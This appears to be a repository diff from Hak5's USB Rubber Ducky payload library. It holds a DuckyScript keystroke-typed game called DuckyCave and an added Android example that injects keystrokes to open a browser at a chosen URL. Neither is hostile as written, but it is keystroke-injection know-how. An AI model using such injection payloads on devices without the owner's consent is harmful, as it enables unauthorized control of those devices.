FUNCTION TRANSLATE_BOOL()
IF ($INPUT == TRUE) THEN
STRING TRUE
ELSE IF ($INPUT == FALSE) THEN
STRING FALSE
ELSE
STRING ?
END_IF
ENTER
END_FUNCTION
VAR $CD = 3
FUNCTION COUNTDOWN()
WHILE ( $CD > 0 )
STRING .
$CD = ($CD - 1)
DELAY 1000
END_WHILE
END_FUNCTION
FUNCTION ENSURE_CAPS_OFF()
IF ($_CAPSLOCK_ON == TRUE) THEN
CAPSLOCK
END_IF
END_FUNCTION
FUNCTION init()
$_RANDOM_MIN = 9
$_RANDOM_MAX = 19
VAR $l_wall = $_RANDOM_INT
$_RANDOM_MIN = 20
$_RANDOM_MAX = 29
VAR $player = $_RANDOM_INT
$_RANDOM_MIN = 30
$_RANDOM_MAX = 40
VAR $r_wall = $_RANDOM_INT
END_FUNCTION
FUNCTION check_input()
VAR $changed = FALSE
IF ($_CAPSLOCK_ON != $lock_state) THEN
$lock_state = $_CAPSLOCK_ON
$direction_changes = ($direction_changes + 1)
IF ($mode == RIGHT) THEN
$mode = LEFT
ELSE
$mode = RIGHT
END_IF
END_IF
END_FUNCTION
FUNCTION end_game()
LED_R
$running = FALSE
END_FUNCTION
FUNCTION move_walls()
$_RANDOM_MIN = 0
$_RANDOM_MAX = 100
VAR $CHANCE = $_RANDOM_INT
IF ($CHANCE > 45) THEN
IF ($l_wall < GAME_MAX_WIDTH) THEN
$l_wall = ($l_wall + 1)
REM STRING l+
END_IF
ELSE
IF ($l_wall > 0) THEN
$l_wall = ($l_wall - 1)
REM STRING l-
ELSE
$l_wall = ($l_wall + 1)
END_IF
END_IF
$CHANCE = $_RANDOM_INT
IF ($CHANCE > 45) THEN
IF ($r_wall > 0) THEN
$r_wall = ($r_wall - 1)
REM STRING r-
END_IF
ELSE
IF ($r_wall < GAME_MAX_WIDTH) THEN
$r_wall = ($r_wall + 1)
REM STRING r+
ELSE
$r_wall = ($r_wall - 1)
END_IF
END_IF
REM ENTER
END_FUNCTION
FUNCTION move_player()
IF ($mode == RIGHT) THEN
IF ($player < GAME_MAX_WIDTH) THEN
$player = ($player + 1)
END_IF
ELSE IF ($mode == LEFT) THEN
IF ($player > 0) THEN
$player = ($player - 1)
END_IF
END_IF
END_FUNCTION
FUNCTION draw()
IF (($player <= $l_wall) || ($player >= $r_wall)) THEN
end_game()
STRING BONK
RETURN 0
END_IF
VAR $l_inside_whitespace = (($player - $l_wall) - 1)
VAR $r_inside_whitespace = (($r_wall - $player) - 1)
IF ($l_wall > 1) THEN
VAR $l_outside_whitespace = ($l_wall - 1)
WHILE ($l_outside_whitespace > 0)
SPACE
$l_outside_whitespace = ($l_outside_whitespace - 1)
END_WHILE
END_IF
STRING |
WHILE ($l_inside_whitespace > 0)
SPACE
$l_inside_whitespace = ($l_inside_whitespace - 1)
END_WHILE
IF ($mode == RIGHT) THEN
STRING >
ELSE IF ($mode == LEFT) THEN
STRING <
END_IF
WHILE ($r_inside_whitespace > 0)
SPACE
$r_inside_whitespace = ($r_inside_whitespace - 1)
END_WHILE
STRING |
ENTER
$score = ($score + 1)
RETURN 0
END_FUNCTION
FUNCTION run()
check_input()
move_walls()
check_input()
move_player()
check_input()
draw()
END_FUNCTION
FUNCTION play_cave()
WHILE TRUE
ENSURE_CAPS_OFF()
$score = 0
LED_G
STRING Game Starting in 3s
$CD = 3
COUNTDOWN()
ENTER
STRING GOOD LUCK!
ENTER
init()
WHILE ($running == TRUE)
DELAY GAME_SPEED
run()
END_WHILE
ENSURE_CAPS_OFF()
ENTER
STRING Left wall:
SPACE
$INPUT = $l_wall
TRANSLATE_INT()
ENTER
STRING Right wall:
SPACE
$INPUT = $r_wall
TRANSLATE_INT()
ENTER
STRING Player position:
SPACE
$INPUT = $player
TRANSLATE_INT()
ENTER
STRING Player Moves:
SPACE
$INPUT = $direction_changes
TRANSLATE_INT()
ENTER
STRING GAME OVER. SCORE:
SPACE
$INPUT = $score
TRANSLATE_INT()
ENTER
STRING https://twitter.com/intent/tweet?text=I%20scored%20
$INPUT = $score
TRANSLATE_INT()
STRING %20in%20DuckyCave%20with%20my%20USB%20Rubber%20Ducky%21%20&url=https://hak5.org/duckycave&hashtags=DuckyCave&via=hak5
ENTER
ENTER
STRINGLN Shall we play again? Press CAPS to restart.
WAIT_FOR_CAPS_CHANGE
$running = TRUE
DELAY 100
END_WHILE
END_FUNCTION
BUTTON_DEF
end_game()
END_BUTTON
play_cave()

18
payloads/library/mobile/Android/Browse-to-URL-Example/payload.txt Normal file
View File

@ -0,0 +1,18 @@
REM Title: Android Browse to URL Example
REM Author: Hak5Darren
REM Desscription: Opens browser. Navigates to URL.
REM Target: "most" Android devices (compatibility varies by vendor implementation)
REM DuckyScript: 3.0
ATTACKMODE HID STORAGE
WAIT_FOR_BUTTON_PRESS
REM HID and STORAGE for convenience. Doesn't execute payload until button press.
DEFINE URL hak5.org
REM Change to URL of your choosing.
GUI b
REM Open browser
DELAY 700
CTRL l
REM Select URL bar
DELAY 700
STRINGLN URL
REM inject URL and press ENTER